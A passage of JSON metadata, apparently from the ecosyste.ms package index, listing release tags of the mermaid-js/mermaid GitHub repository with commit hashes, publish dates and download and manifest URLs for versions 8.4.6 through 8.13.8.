e.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/merm